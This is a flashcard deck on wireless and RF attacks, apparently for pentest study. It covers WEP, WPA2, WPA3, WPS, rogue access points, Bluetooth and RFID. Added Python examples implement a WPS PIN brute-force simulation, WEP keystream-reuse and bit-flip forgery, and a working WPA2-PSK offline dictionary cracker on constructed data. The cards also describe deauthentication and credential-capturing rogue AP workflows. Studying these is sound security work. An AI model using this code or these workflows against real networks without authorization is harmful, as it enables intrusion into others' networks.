Wireless and RF Attacks Flashcards

1
Q

Which organization defines and limits the power ranges that can be applied to Wi-Fi-enabled devices?

A

The Federal Communications Commission (FCC), in the United States. Other countries have their own regulators, which is why the regulatory domain (country code) configured on a wireless adapter determines the channels and transmit power it is allowed to use.

2
Q

What two modes do wireless networks operate in, and what do they mean?

A

1) Ad hoc mode, in which stations connect directly to each other peer-to-peer. 2) Infrastructure mode, in which stations communicate through a central device (the access point) instead of directly with each other.

3
Q

Which three frames associated with a wireless network does the 802.11 standard define?

A

Management, control, and data

4
Q

What is the process of listening to a private conversation without the other party knowing you are doing so?

A

Eavesdropping

5
Q

Which wireless security protocol was designed to allow users to set up secure wireless networks and reduce the overall complexity of associating additional hosts to a network?

A

Wi-Fi Protected Setup (WPS)

6
Q

Which wireless security protocol requires user interaction to initiate communication and uses WPA/WPA2 security and an 8-digit PIN to connect?

A

Wi-Fi Protected Setup (WPS)

7
Q

What are some common tools used to attack WPS?

A

wash to discover WPS-enabled access points; reaver for online brute-force PIN attacks and, together with pixiewps, for offline Pixie Dust attacks against implementations with weak nonce generation; and wifite to automate both.

8
Q

What form of wireless encryption relies on a secret key that is shared between the access point and the clients on the network using the RC4 stream cipher?

A

Wired Equivalent Privacy (WEP)

9
Q

WEP was the standard before WPA. Its 24-bit initialization vector (IV) is sent in the clear and repeats quickly, so RC4 keystreams are reused; this makes the key recoverable from captured traffic and also enables fragmentation and replay attacks. What tools can be used to attack WEP?

A

airodump-ng captures the traffic, aireplay-ng replays captured ARP requests so the AP generates new IVs quickly, and aircrack-ng recovers the secret key from the collected IVs (its default PTW attack needs only tens of thousands of them). wifite automates the whole chain.

10
Q

Which protocol kept WEP's RC4 stream cipher (so it could run on existing hardware) but added per-packet key mixing, so each frame is encrypted with a unique key, along with a longer 48-bit IV/sequence counter and the Michael message integrity check?

A

Temporal Key Integrity Protocol (TKIP)

11
Q

WPA/WPA2-Personal uses a four-way handshake and a shared passphrase. What are some of its weaknesses?

A

Offline dictionary attacks against a captured four-way handshake (the PMK is derived from the passphrase and SSID, so a weak passphrase falls to guessing), and deauthentication attacks that force a client to reconnect so the handshake can be captured. Tools include aircrack-ng, aireplay-ng, airodump-ng, wifite, coWPAtty, genpmk and hashcat.

12
Q

WPA3 replaces the PSK handshake with the Dragonfly (SAE) key exchange, so a captured handshake no longer allows an offline passphrase guess. What attacks is it still susceptible to?

A

Downgrade attacks (forcing a client back to WPA2 when the network runs in transition mode) and timing and cache-based side-channel attacks on the Dragonfly password element derivation (the Dragonblood findings).

13
Q

What Kali Linux commands can be used to show compatible channels, frequencies, encryption capabilities, and further manipulate the interface by enabling or disabling it or by manually configuring it on a wireless network?

A

iw, iwlist, iwconfig. iwconfig and iwlist come from the legacy wireless-tools package; iw is the current nl80211-based tool and should be preferred on modern kernels.

14
Q

What is a surveillance technique for discovering SSIDs, router vendor information and signal strength, MAC addresses, channels, access control protections (encryption) and more?

A

Stumbling

15
Q

What is a tactical surveillance process for surveying an area for access points while in a moving vehicle?

A

Wardriving

16
Q

What open-source software suite provides tools for monitoring RF communication and security testing of Wi-Fi networks?

A

aircrack-ng

17
Q

What is a popular wireless sniffing tool included in the aircrack-ng toolset that can be used during a pentest to discover and validate wireless targets?

A

airodump-ng

18
Q

What tool can do 802.11 sniffing and perform wireless intrusion detection, with better GPS support than airodump-ng?

A

Kismet

19
Q

Which Kali tool can identify WPS networks and supports active probing of detected wireless networks to identify whether they support WPS?

A

wash

20
Q

After you have discovered a WPS PIN-controlled target with a tool like wash, what command can you use in Kali to brute-force attack the PIN?

A

reaver

21
Q

Which Kali tool exploits a design flaw in WPS external-registrar PIN authentication, where the AP confirms the first and second halves of the 8-digit PIN separately and the last digit is only a checksum, so at most 10,000 + 1,000 = 11,000 attempts are needed instead of 10^8?

A

reaver
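
Worked example, added here and not part of the original deck: a simulation of why the split PIN check bounds reaver's search at 11,000 tries. The checksum routine is the standard WPS algorithm; the registrar oracle, the target PIN and the resulting attempt counts are constructed for the demo and stand in for a real AP's NACK responses at M4 and M6.

```python
# Added example: simulates the WPS external-registrar PIN check that reaver
# exploits. The checksum routine is the real WPS algorithm; the oracle, the
# target PIN and the attempt counts are constructed for this demo.

TARGET_PIN = "12345670"  # constructed target, not a real device's PIN


def wps_checksum(first7: int) -> int:
    """Checksum digit for a WPS PIN: weights 3,1,3,1,3,1,3 over the seven
    digits, taken from the right, so that weighted sum + checksum == 0 mod 10."""
    acc, n = 0, first7
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    """True if the 8-digit PIN's last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class WpsRegistrarOracle:
    """Stand-in for the AP. In the real protocol the AP proves knowledge of the
    first PIN half in M4 and of the second half in M6; a wrong half is answered
    with a NACK at that step, which leaks which half was wrong."""

    def __init__(self, pin: str):
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK_M4"   # first half wrong
        if pin[4:] != self.pin[4:]:
            return "NACK_M6"   # first half right, second half wrong
        return "M7"            # both halves accepted


def split_bruteforce(oracle: WpsRegistrarOracle):
    """Recover the PIN half by half: 10^4 candidates for the first half, then
    10^3 for the second (its last digit is fixed by the checksum).
    Returns (pin, attempts)."""
    first = None
    for i in range(10_000):
        # second half is a placeholder until the first half is confirmed
        if oracle.try_pin(f"{i:04d}0000") != "NACK_M4":
            first = f"{i:04d}"
            break
    if first is None:
        return None, oracle.attempts
    for j in range(1_000):
        first7 = int(first + f"{j:03d}")
        candidate = f"{first7:07d}{wps_checksum(first7)}"
        if oracle.try_pin(candidate) == "M7":
            return candidate, oracle.attempts
    return None, oracle.attempts


def search_space():
    """(valid PINs a naive brute force must cover, worst-case tries with the split leak)."""
    return 10 ** 7, 10_000 + 1_000
```

The 11,000 figure is the worst case; on average about half that many tries are needed. Most current APs lock WPS after a handful of failures, which is why the offline Pixie Dust variant is preferred where the AP's nonce generation is weak.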

22
Q

What kind of attack speeds up WEP cracking by recovering a chunk of RC4 keystream (PRGA) from a single captured frame, which can then be used to forge and inject arbitrary packets at the access point, but does not itself recover the key?

A

Fragmentation attack

23
Q

Which two tools, used together, can crack WPA/WPA2-PSK by precomputing PMKs for a specific SSID into a hash file (a per-SSID rainbow table, since the SSID is the PBKDF2 salt) and then testing those PMKs against a four-way handshake taken from a PCAP file?

A

genpmk (precomputes the PMKs) and coWPAtty (checks them against the captured handshake)

24
Q

Which wireless attack tool, commonly used alongside the aircrack-ng suite, can launch denial of service attacks such as deauthentication and beacon flooding?

A

mdk4. Note that mdk4 is a separate project, not part of the aircrack-ng suite; within the suite itself, aireplay-ng's deauthentication mode (--deauth) is the usual denial of service option.

25
Q

Rogue AP attacks may be used against WPA-Enterprise (802.1X/EAP) deployments that rely on RADIUS, for example to capture credentials or challenge/response pairs from clients that do not validate the server certificate. What tools can you use to launch such attacks?

A

hostapd (HostAP) and its hostapd-wpe variant, EAPHammer, airbase-ng, and aireplay-ng to deauthenticate clients so they reconnect to the rogue AP.

26
Q

What popular access point software, run from an operating system such as Kali Linux, lets the host act as a Wi-Fi access point (and, combined with a DHCP server and routing, perform the functions of a typical wireless router)?

A

hostapd (referred to as HostAP in some guides)

27
Q

What rogue AP technique, unlike an evil twin that impersonates one specific network, listens for every probe request a client sends for the networks it remembers and answers each one, advertising that ESSID so the client connects to the attacker's AP?

A

Karma attack

28
Q

What group of standards defines specifications for various categories of wireless personal area networks (WPANs), including Bluetooth and ZigBee?

A

802.15

29
Q

When hacking Bluetooth-enabled devices, what is the process of information gathering called?

A

Blueprinting

30
Q

What is the default protocol stack for Bluetooth in most Linux distributions, including Kali?

A

BlueZ

31
Q

Which attack exploits flaws in the Bluetooth OBEX implementation of certain (mostly older) devices' firmware in order to pull information such as contacts and calendar entries from the device without the owner's consent?

A

Bluesnarfing

32
Q

Which tool in Kali Linux is capable of carrying out a Bluesnarfing attack?

A

Bluesnarfer

33
Q

What is a method of sending unsolicited messages to mobile users using Bluetooth?

A

Bluejacking

34
Q

What device is small enough to be installed inside a card reader, without arousing suspicion, to intercept and replay the Wiegand data sent between the RFID reader and the door controller?

A

ESPKey

35
Q

What is the process of reading a series of bits from one RFID card or key fob and writing the same series of bits to another compatible card?

A

RFID cloning

36
Q

List five protocols (often taught as the five layers) of the classic Bluetooth protocol stack.

A

SDP, LMP, L2CAP, RFCOMM, and TCS

37
Q

WEP uses an encryption algorithm called RC4, developed by Ronald Rivest. RC4 is a ______________ cipher, a symmetric-key cipher that expands a short key into an arbitrarily long pseudo-random keystream which is XORed with the plaintext.

A

Stream. RC4 is an older algorithm used to encrypt WEP networks; because the keystream is simply XORed with the data, any reuse of a keystream (same key and IV) leaks the XOR of two plaintexts.

38
Q

CRC-32 is the algorithm WEP uses to compute the integrity check value (ICV) of each frame, and it is widely used elsewhere to detect accidental corruption. CRC-32 is based on the original cyclic redundancy check and is not suitable for verifying integrity against an attacker because ___________.

A

CRC-32 is a noncryptographic, unkeyed and linear checksum: anyone can compute it, and because it is linear, an attacker can flip chosen bits in an encrypted WEP frame and adjust the encrypted ICV so the modified frame still passes the integrity check.
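
Worked example, added here and not part of the original deck, for the RC4 and CRC-32 cards above (and the WEP cards earlier in the deck): a minimal WEP frame format built from real RC4 and zlib's CRC-32. It shows that two frames under the same IV leak the XOR of their plaintexts without the key, and that the CRC-32 ICV can be corrected after flipping bits in the ciphertext. The key, IV and plaintexts are constructed for the demo; the FMS/PTW key-recovery attack that aircrack-ng uses is not implemented here.

```python
# Added example: a toy WEP encapsulation (real RC4 + CRC-32 ICV) used to show
# keystream reuse under a repeated IV and the CRC-32 bit-flipping weakness.
# Key, IV and plaintexts below are constructed for the demo.
import struct
import zlib


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes for `key` (KSA followed by PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 over the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body: 3-byte IV in the clear, then RC4(IV||key) XOR (plaintext||ICV)."""
    body = plaintext + icv(plaintext)
    return iv + xor(body, rc4(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns (plaintext, icv_ok)."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4(iv + key, len(ct)))
    pt, tag = body[:-4], body[-4:]
    return pt, tag == icv(pt)


def iv_reuse_leak(frame1: bytes, frame2: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so XORing the
    ciphertexts (IV and ICV bytes stripped) yields P1 XOR P2 with no key."""
    assert frame1[:3] == frame2[:3], "demo requires a repeated IV"
    n = min(len(frame1), len(frame2)) - 3 - 4
    return xor(frame1[3:3 + n], frame2[3:3 + n])


def bitflip(frame: bytes, delta: bytes) -> bytes:
    """Change the plaintext to P XOR delta and keep the ICV valid, without the
    key. CRC-32 is affine: crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros)."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    delta = delta.ljust(n, b"\x00")
    icv_delta = xor(icv(delta), icv(b"\x00" * n))
    return iv + xor(ct[:n], delta) + xor(ct[n:], icv_delta)


def naive_flip(frame: bytes, delta: bytes) -> bytes:
    """Same plaintext change but without correcting the ICV: the frame decrypts
    to the intended text yet fails the integrity check, so the AP drops it."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    return iv + xor(ct[:n], delta.ljust(n, b"\x00")) + ct[n:]


def demo():
    """Runs both attacks on constructed frames; returns (leak, tampered_pt, icv_ok)."""
    key = b"\x01\x02\x03\x04\x05"          # constructed 40-bit WEP key
    iv = b"\x00\x00\x01"                   # the same IV used twice
    p1 = b"GET /index.html HTTP/1.0"
    p2 = b"POST /login.php HTTP/1.0"
    f1, f2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    leak = iv_reuse_leak(f1, f2)           # == p1 XOR p2; knowing p1 gives p2
    tampered = bitflip(f1, xor(b"GET", b"PUT"))
    pt, ok = wep_decrypt(key, tampered)    # "PUT ..." and the ICV still verifies
    return leak, pt, ok
```

Because the IV is only 24 bits and many drivers reset or increment it predictably, repeated IVs are guaranteed on a busy network; the keystream recovered from a known plaintext (for example a predictable ARP request) is what the fragmentation and replay tools build on.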

39
Q

In order to crack WEP, you need to capture enough frames with distinct initialization vectors to recover the secret key. WEP keys come in two lengths. A 64-bit WEP key is entered as 10 hexadecimal digits (40 secret bits; the remaining 24 bits are the per-frame IV). How many hexadecimal digits are in a 128-bit key?

A

26 (104 secret bits plus the 24-bit IV).

40
Q

With WPA/WPA2-Personal, the wireless client and the access point both know the preshared key. During the four-way handshake, each side derives the pairwise master key (PMK) from the PSK and combines it with both MAC addresses and both nonces to derive a _______________, which is used to protect unicast traffic between the two. What is this key called?

A

Pairwise transient key (PTK), from which the key confirmation key (KCK), key encryption key (KEK) and temporal key (TK) are taken.

41
Q

During a pentest, your team identifies an access point that is broadcasting its SSID and is protected only with WEP. Your team attempts to use aireplay-ng to replay an injected ARP packet over the network; however, the tool has not captured any ARP requests, most likely because no clients are talking on the network. In order to speed up the cracking process, what could you recommend your team do?

A

Use the ping command against nonexistent hosts on the network: each unanswered ARP request is relayed by the AP as a fresh encrypted frame, so repeated pings generate new IVs even with no active clients. Note that this requires a host that is already associated with the network; with no such host, the standard aircrack-ng approach is fake authentication (aireplay-ng -1), a fragmentation (-5) or chopchop (-4) attack to recover keystream, packetforge-ng to craft an ARP request, and interactive injection (aireplay-ng -2) to replay it.

42
Q

What kind of wireless attack forces a client to perform a new handshake so that the information needed for offline passphrase guessing can be captured?

A

Deauthentication attacks

43
Q

What is PBKDF2?

A

Password-Based Key Derivation Function 2, a key derivation function with a tunable (sliding) iteration count that makes each guess more expensive and so slows brute-force attacks. WPA/WPA2-Personal derives the PMK as PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), so every candidate passphrase costs 8192 HMAC-SHA1 operations and the result is bound to one SSID.

44
Q

In order to crack the WPA or WPA2 PSK, you need to capture the four-way handshake. During a pentest, your team identifies multiple clients on the target network. What is the best way to capture the handshake?

A

Deauthenticate one of the clients (for example with aireplay-ng --deauth) while airodump-ng is capturing on the AP's channel; the client reconnects and the four-way handshake is recorded.
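
Worked example, added here and not part of the original deck, for the PMK/PTK, PBKDF2, handshake-capture and genpmk/coWPAtty cards: the offline dictionary attack those tools perform, carried out end to end in Python. The PBKDF2 parameters, the PRF-512 expansion and the HMAC-SHA1 MIC check are the standard's; the SSID, MAC addresses, nonces, passphrase and EAPOL message 2 layout are constructed for the demo so the block runs offline.

```python
# Added example: WPA2-PSK key derivation and an offline dictionary attack
# against a constructed four-way-handshake message 2. SSID, MACs, nonces,
# passphrase and the EAPOL frame are constructed for the demo.
import hashlib
import hmac
import struct

SSID = "CorpWiFi"                            # constructed
AP_MAC = bytes.fromhex("001122334455")       # constructed
STA_MAC = bytes.fromhex("66778899aabb")      # constructed
ANONCE = bytes(range(32))                    # constructed, a real one is random
SNONCE = bytes(range(32, 64))                # constructed, a real one is random
PASSPHRASE = "correct horse"                 # constructed target passphrase
MIC_OFFSET = 81                              # EAPOL hdr 4 + desc 1 + info 2 + len 2 + replay 8 + nonce 32 + iv 16 + rsc 8 + id 8


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 256 bits). The SSID is the
    salt, so a precomputed PMK table (genpmk) is valid for one SSID only."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    return b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK from PMK, both MACs and both nonces; KCK/KEK/TK are its first 48 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf512(pmk, b"Pairwise key expansion", data)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (RSN descriptor, key info version 2 = HMAC-SHA1 MIC)."""
    key_info = 0x010A                                   # version 2 | pairwise | MIC bit
    body = struct.pack(">BHHQ", 2, key_info, 16, 1)      # desc type, key info, key len, replay ctr
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, key ID
    body += mic + struct.pack(">H", 0)                  # MIC, key data length
    return struct.pack(">BBH", 1, 3, len(body)) + body  # EAPOL version, type Key, length


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def make_capture(passphrase: str = PASSPHRASE) -> bytes:
    """What airodump-ng would record: message 2 carrying a MIC under the real KCK."""
    kck = derive_ptk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)["kck"]
    unsigned = build_eapol_msg2(SNONCE)
    return unsigned[:MIC_OFFSET] + eapol_mic(kck, unsigned) + unsigned[MIC_OFFSET + 16:]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, frame, wordlist):
    """Offline attack: PMK -> PTK -> KCK per candidate, recompute the MIC and
    compare with the captured one. Returns the passphrase or None."""
    captured = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = derive_ptk(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)["kck"]
        if hmac.compare_digest(eapol_mic(kck, frame), captured):
            return word
    return None
```

aircrack-ng, coWPAtty and hashcat run this same loop, only faster; the cost per guess is fixed by the 4096 PBKDF2 iterations, and because the SSID is the salt, a genpmk table only helps against one network name. Deauthenticating a client merely makes messages 1 to 4 appear on the air; everything after the capture is offline, which is why the passphrase strength is all that protects a WPA2-Personal network.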